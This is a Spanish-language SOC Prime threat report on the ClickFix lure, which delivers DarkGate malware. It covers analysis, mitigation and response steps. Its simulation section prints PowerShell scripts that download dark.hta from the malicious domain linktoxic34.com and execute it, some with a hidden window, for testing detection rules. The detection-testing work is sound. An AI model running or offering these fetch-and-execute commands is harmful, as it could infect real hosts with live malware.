SOC Prime Bias: Medium

16 Dec 2025 18:08 UTC

Estudio de Caso de ClickFix: Malware DarkGate

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Estudio de Caso de ClickFix: Malware DarkGate
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El informe describe un método de ingeniería social denominado ClickFix que persuade a los usuarios para que copien y ejecuten un comando de PowerShell, que luego descarga un archivo HTA malicioso. Este archivo HTA a su vez descarga componentes adicionales, incluyendo un script de AutoIt que crea directorios, deja caer archivos y establece comunicaciones C2. La actividad se atribuye a la campaña DarkGate y se basa en la ofuscación base64 más la manipulación del portapapeles para evitar una detección directa.

Investigación

Los analistas desentrañaron varias capas de contenido codificado en base64, incrustado en una página de advertencia de extensión de navegador falsa y recuperaron el comando de PowerShell responsable de obtener dark.hta desde linktoxic34.com. Cuando se ejecuta, el HTA despliega un ejecutable de AutoIt (fckhffh.a3x) que ejecuta una rutina DES y lanza más cargas útiles. La telemetría de red capturada muestra tráfico HTTP(S) hacia el dominio malicioso, seguido de la ejecución encadenada de scripts de PowerShell.

Mitigación

Las defensas recomendadas incluyen la capacitación de los usuarios para desalentar la copia de fragmentos de código desconocidos, deshabilitar el cuadro de diálogo Ejecutar de Windows a través de la Política de Grupo y desplegar soluciones antivirus basadas en comportamiento. Bloquear proactivamente el dominio malicioso y monitorear ejecuciones anómalas de PowerShell puede reducir significativamente el riesgo de infección de DarkGate.

Respuesta

Si se identifica un evento relacionado con ClickFix, aísle el endpoint afectado, detenga todos los procesos maliciosos, elimine los archivos HTA y AutoIt, y realice un análisis forense en cualquier carpeta creada durante la intrusión. Actualice la lógica de detección para señalar patrones de ejecución sospechosos de PowerShell y HTA y asegúrese de que el dominio asociado esté bloqueado en todo el entorno.

Flujo de Ataque

Ejecución de Simulación

Requisito previo: La verificación previa de Telemetría & Baseline debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.

  • Narrativa de Ataque y Comandos:
    Un atacante que ha ganado acceso de bajo privilegio en un host de Windows comprometido desea descargar una carga útil HTA maliciosa utilizada en la campaña ClickFix. Para permanecer sigiloso, el atacante aprovecha PowerShell—una herramienta nativa de Windows—para que no se introduzcan binarios externos. El comando se ejecuta directamente en la consola (o a través de una tarea programada) e incluye la URL exacta que la regla vigila. La descarga se almacena en el %TEMP% del usuario y luego se ejecuta a través de Start-Process.

    $url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $out = "$env:TEMPdark.hta"
    Invoke-WebRequest -Uri $url -OutFile $out
    Start-Process -FilePath $out
  • Script de prueba de regresión: (autónomo, reproduce los pasos anteriores)

    # Simulación de descarga HTA de ClickFix – activa la regla Sigma
    $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $destPath = "$env:TEMPdark.hta"
    
    try {
        Write-Host "[*] Descargando carga útil HTA maliciosa..."
        Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing
        Write-Host "[+] Descarga completada. Ejecutando carga útil..."
        Start-Process -FilePath $destPath -WindowStyle Hidden
    } catch {
        Write-Error "Descarga o ejecución fallida: $_"
    }
  • Comandos de limpieza: (elimina el HTA descargado y cualquier instancia en ejecución)

    # Eliminar el archivo HTA y terminar cualquier proceso persistente
    $htaPath = "$env:TEMPdark.hta"
    if (Test-Path $htaPath) {
        Remove-Item $htaPath -Force
        Write-Host "[*] Archivo HTA eliminado."
    }
    # Terminar cualquier proceso que pueda haber sido lanzado desde el HTA (ejemplo genérico)
    Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force